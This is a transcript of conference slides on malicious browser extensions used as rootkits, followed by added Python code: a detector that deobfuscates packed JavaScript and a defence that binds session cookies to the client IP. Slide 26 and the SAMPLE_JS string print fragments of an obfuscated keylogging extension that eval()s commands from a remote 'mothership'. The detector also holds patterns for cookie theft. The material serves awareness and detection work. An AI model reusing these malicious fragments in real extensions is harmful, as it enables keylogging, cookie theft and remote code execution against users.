Hacktivityonly 121013141039-phpapp02
  1. Introduction
     Zoltán Balázs, ITSEC consultant, Deloitte Hungary
     OSCP, CISSP, C|HFI, CPTS, MCP
     http://www.slideshare.net/bz98
     Cyberlympics finals, member of the gula.sh team
  2. I love Hacking
  3. I love Zombie movies
  4. I love LOLcats
  5. Zombies + Hacking + LOLcats = I R ZOMBIE BROWSER
  6. Zombie browsers, spiced with rootkit extensions (Hacktivity 2012)
     • Legal disclaimer:
     • All points of view and thoughts are mine.
     • The contents of this presentation have no connection with my employer's opinion, whether past, present or future.
     • What you will hear may be used only in test labs, and only for good.
  7. About:presentation
     • History of malicious extensions (add-on, plug-in, extension, BHO)
     • Focus on Firefox, Chrome, Safari
     • Advantages – disadvantages
     • Browser extension rootkits
     • Live demo – home-made extension
  8. History of malicious Firefox extensions
     • 90% of malicious extensions were created for Facebook spamming
     • 2004–2010: 5
     • 2011: 5
     • Jan 01, 2012 – Oct 06, 2012: 48*
     *Data from mozilla.org
  9. More examples on Facecrook (text © F-Secure)
  10. My zombie extension
     • Command and Control
     • Stealing cookies, passwords
     • Uploading/downloading files (Firefox; Chrome NPAPI on the to-do list)
     • Binary execution (Firefox on Windows; Chrome NPAPI on the to-do list)
     • Geolocation
  11. Safari demo
  12. Installing the extension
     • Physical access
     • Social engineering
     • Remote code execution – without user interaction
  13. Firefox rootkit 1
     • Hook into other extensions (even signed ones)
  14. Firefox rootkit 2
     • visible = false
  15. Firefox rootkit 3
     • Seen in the wild
  16. Quick Quiz – for Hacker Pschorr
  17. Quick Quiz
     • Which company developed the first Netscape plugin?
     • *****
  18. Quick Quiz
     • Which company developed the first Netscape plugin?
     • A***e
  19. Quick Quiz
     • Which company developed the first Netscape plugin?
     • Adobe, in 1995
  20. Risks of a Zombie Browser
     • Eats your brain while you are asleep
  21. Risks of a Zombie Browser
  22. Risks of a Zombie Browser
     • Firewall/proxy
       • Local firewall
       • Application whitelisting
       • Web-filtering
  23. Risks of a Zombie Browser
     • Cross-platform
       • Cross-domain Universal XSS
       • Every secret is available
       • Password input method does not matter (password safe, virtual keyboard, etc.)
       • Before SSL (+ JS obfuscation)
     • Malicious source codes are available
       • Advantage against meterpreter
       • exe/dll is not needed for persistence
       • Writing into the registry is not needed
  24.–25. Risks of a zombie browser
     • Low AV signature-based detection rate
       • Sample from January 2011 – October 2012: 0/44
     • Extension vs. behavioral-based detection
  26. Friendly message to AV developers: try harder…
     Code snippets from an undetected malicious browser extension:
     var _0x39fe=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74…
     _0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39fe[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]];
     keylogger_namespace.keylogger…
     for(var x in mothership){if (mothership[x].command == "eval"){eval(mothership[x].data);
  27. Profit ...
  28. Firefox
  29. Disadvantages (for the hacker)
     • Not a real rootkit
     • Browser limitations (e.g. port scan)
     • Platform limitations (e.g. binary code execution only on Windows)
     • Runs in user space
     • Runs only while the browser is open
     • Extensions are not yet supported in:
       • Chrome on Android/iOS
       • Safari on iOS
  30. Chrome – rootkit
  31. Chrome – distributed password hash cracking
     • Idea and coding by my friend and colleague, WoFF
     • Password hash cracking performance
       • JavaScript: 82,000 hash/sec
       • Chrome Native Client: 840,000 hash/sec
       • Native code (john): 11,400,000 hash/sec
  32. ChromeOS DEMO
  33.–34. ChromeOS DEMO
     Not today :-(
     • No extension install from 3rd-party sites
     • No Flash, no Java, no NPAPI
  35. Firefox webcam
  36. Browser extensions might be bad
     • @antivirus developers
       • Be reactive
       • The browser is the new OS
     • @browser developers (Mozilla)
       • Default deny installing extensions from 3rd-party sites
       • Chrome-level security
       • Require permissions
       • Extension components – separate privileges
     • @browser developers (Google) – keep up the good work
       • but disable NPAPI :)
  37. Browser extensions might be bad
     • @website developers
       • There is no prevention against password stealing
       • Cookie stealing: restrict the session to the client IP (by default)
     • @users
       • Beware of malicious browser extensions
       • Use a separate OS for e-banking and other sensitive stuff
       • Removal: create a new clean profile in a clean OS
     • @companies
       • Control which browsers users can use
       • Restrict extensions via GPO
  38. Browser extensions might be bad, Mmmkay???
     zbalazs@deloittece.com
     zbalazs4
     hu.linkedin.com/in/zbalazs
     Code will be released under GPL in 2012
     Greetz to @hekkcamp
  39. References
     • Grégoire Gentil: Hack any website, 2003
     • Christophe Devaux, Julien Lenoir: Browser rootkits, 2008
     • Duarte Silva: Firefox FFSpy PoC, 2008
     • Andreas Grech: Stealing login details with a Google Chrome extension, 2010
     • Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011
     • Nicolas Paglieri: Attacking Web Browsers, 2012
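Slides 24 to 26 make the point that signature-based AV misses this kind of extension while its behaviour (a hex-escaped string table, an alias table, a keylogger namespace, and a loop that eval()s whatever the "mothership" returns) is plain once the strings are decoded. The following triage helper is an added example, not code from the talk or from any AV product: it decodes \x/\u escapes, resolves `_0xNNNN[i]` table references (iteratively, so alias tables built from another table are resolved too), and then scores the decoded source against a few behavioural indicators. SAMPLE_JS is a constructed sample written in the style of slide 26, not the real extension's source; the indicator names and all function names are ours.

```python
import re
from typing import Dict, List

# Constructed sample in the style of the snippet on slide 26 (not the real
# extension's source): a \x-escaped string table, an alias table built from it,
# a keylogger namespace and a command loop that eval()s C2 responses.
SAMPLE_JS = r'''
var _0x39fe=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x63\x6F\x6F\x6B\x69\x65"];
var _0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4]];
var s=document[_0xaed4[1]](_0xaed4[0]);s[_0xaed4[2]]=_0xaed4[3];
var keylogger_namespace={};keylogger_namespace.keylogger=function(e){};
var c=document[_0xaed4[4]];
for(var x in mothership){if(mothership[x].command=="eval"){eval(mothership[x].data);}}
'''

_HEX_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})')
_UNI_ESC = re.compile(r'\\u([0-9A-Fa-f]{4})')
# `var _0xNNNN=[ ... ];` string tables, the usual shape of this obfuscator's output
_STRING_TABLE = re.compile(r'var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[(.*?)\]\s*;', re.S)
_STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Behavioural indicators, checked on the *decoded* source. Names are ours.
INDICATORS = {
    "eval-of-remote-data": re.compile(r'eval\s*\(\s*\w+\[\w+\]\.\w+'),
    "c2-command-loop": re.compile(r'\.command\s*==\s*"'),
    "cookie-access": re.compile(r'document\s*(?:\.cookie\b|\[\s*"cookie"\s*\])'),
    "script-injection": re.compile(
        r'(?:\.createElement|\[\s*"createElement"\s*\])\s*\(\s*"script"\s*\)'),
    "keylogger-naming": re.compile(r'keylogger', re.I),
}


def decode_js_escapes(literal: str) -> str:
    """Turn \\xHH and \\uHHHH escapes inside a JS string literal back into text."""
    literal = _HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), literal)
    return _UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), literal)


def extract_string_tables(src: str) -> Dict[str, List[str]]:
    """Collect every `var _0xNNNN=[...]` whose elements are string literals, decoded."""
    tables = {}
    for name, body in _STRING_TABLE.findall(src):
        entries = [decode_js_escapes(lit) for lit in _STRING_LIT.findall(body)]
        if entries:
            tables[name] = entries
    return tables


def inline_table_refs(src: str, tables: Dict[str, List[str]]) -> str:
    """Replace `_0xNNNN[i]` with the decoded literal so real API names become visible."""
    out = src
    for name, entries in tables.items():
        ref = re.compile(re.escape(name) + r'\[(\d+)\]')
        out = ref.sub(lambda m, e=entries: '"%s"' % e[int(m.group(1))]
                      if int(m.group(1)) < len(e) else m.group(0), out)
    return out


def deobfuscate(src: str, max_rounds: int = 5) -> str:
    """Extract tables and inline references until nothing changes. An alias table
    such as _0xaed4 only becomes a literal table after round one, so it is
    resolved in round two."""
    cur = src
    for _ in range(max_rounds):
        nxt = inline_table_refs(cur, extract_string_tables(cur))
        if nxt == cur:
            break
        cur = nxt
    return cur


def hex_escape_ratio(src: str) -> float:
    """Share of string-literal content written as \\xHH escapes. Ordinary extension
    code sits near 0; a packed string table sits near 1 whatever the strings say."""
    lits = _STRING_LIT.findall(src)
    total = sum(len(lit) for lit in lits)
    if total == 0:
        return 0.0
    escaped = sum(len(m.group(0)) for lit in lits for m in _HEX_ESC.finditer(lit))
    return escaped / total


def analyze(src: str) -> dict:
    """Decode the source and report which behavioural indicators it exhibits."""
    clean = deobfuscate(src)
    hits = [name for name, rx in INDICATORS.items() if rx.search(clean)]
    ratio = hex_escape_ratio(src)
    if ratio > 0.5:
        hits.append("hex-escaped-string-table")
    return {"tables": extract_string_tables(clean), "deobfuscated": clean,
            "indicators": sorted(hits), "hex_escape_ratio": round(ratio, 3)}


if __name__ == "__main__":
    report = analyze(SAMPLE_JS)
    print(report["deobfuscated"])
    print("indicators:", report["indicators"], "hex ratio:", report["hex_escape_ratio"])
```

The two signals are deliberately independent: the indicator regexes only fire on the decoded source, while the escape ratio flags the packer itself, so renaming `mothership` or `keylogger` does not get the sample past both. Run over the unpacked contents of an extension package, this is the "behavioral-based detection" direction the slides ask AV developers to take, and it is cheap enough to apply to every installed extension on a host.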
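The website-developer advice on slide 37 (restrict the session to the client IP) can be implemented server-side with a signed session cookie that carries the address it was issued to. The code below is an added example and is not code from the talk: SERVER_KEY, issue_session and validate_session are names chosen here, and the token layout (urlsafe-base64 payload, a dot, an HMAC-SHA256 tag) is one reasonable design, not a standard. A cookie value copied out of the browser by an extension and replayed from another host fails the IP check; a tampered payload fails the signature check before the IP is even compared.

```python
import base64
import binascii
import hashlib
import hmac
import secrets
import time
from typing import Optional, Tuple

# Demo-only key generated at import time; a real service loads it from protected config.
SERVER_KEY = secrets.token_bytes(32)


def _sign(payload: bytes) -> str:
    return hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()


def issue_session(user: str, client_ip: str, ttl: int = 3600,
                  now: Optional[int] = None) -> str:
    """Mint the cookie value: urlsafe-base64(user|client_ip|expiry) + "." + HMAC.
    The client address sits inside the signed payload, so it cannot be edited out."""
    if "|" in user or "|" in client_ip:
        raise ValueError("field separator not allowed in user or address")
    now = int(time.time()) if now is None else now
    payload = f"{user}|{client_ip}|{now + ttl}".encode()
    return base64.urlsafe_b64encode(payload).decode() + "." + _sign(payload)


def validate_session(token: str, client_ip: str,
                     now: Optional[int] = None) -> Tuple[Optional[str], Optional[str]]:
    """Return (user, None) when the token is genuine, unexpired and presented from
    the address it was bound to; otherwise (None, reason)."""
    now = int(time.time()) if now is None else now
    try:
        b64, tag = token.split(".", 1)
        payload = base64.urlsafe_b64decode(b64.encode())
    except (ValueError, binascii.Error):
        return None, "malformed"
    # Constant-time comparison; checked first so forged payloads never reach the parser.
    if not hmac.compare_digest(tag, _sign(payload)):
        return None, "bad-signature"
    try:
        user, bound_ip, expiry = payload.decode().split("|")
    except ValueError:
        return None, "malformed"
    if now > int(expiry):
        return None, "expired"
    if bound_ip != client_ip:
        # Intact cookie, different host: the replay-from-the-attacker's-machine case.
        return None, "ip-mismatch"
    return user, None


if __name__ == "__main__":
    tok = issue_session("alice", "203.0.113.10")      # addresses are documentation ranges
    print(validate_session(tok, "203.0.113.10"))      # ('alice', None)
    print(validate_session(tok, "198.51.100.7"))      # (None, 'ip-mismatch')
```

Two limits worth stating. First, this only stops the cookie from being *reused elsewhere*; an extension that drives requests from inside the victim's own browser still presents the right address, which is why the same slide says there is no prevention against password stealing at the website level. Second, mobile and NAT'd clients change addresses legitimately, so binding to the full IP costs sessions; binding to a /24 or /48, or re-authenticating on mismatch instead of hard-failing, are the usual compromises.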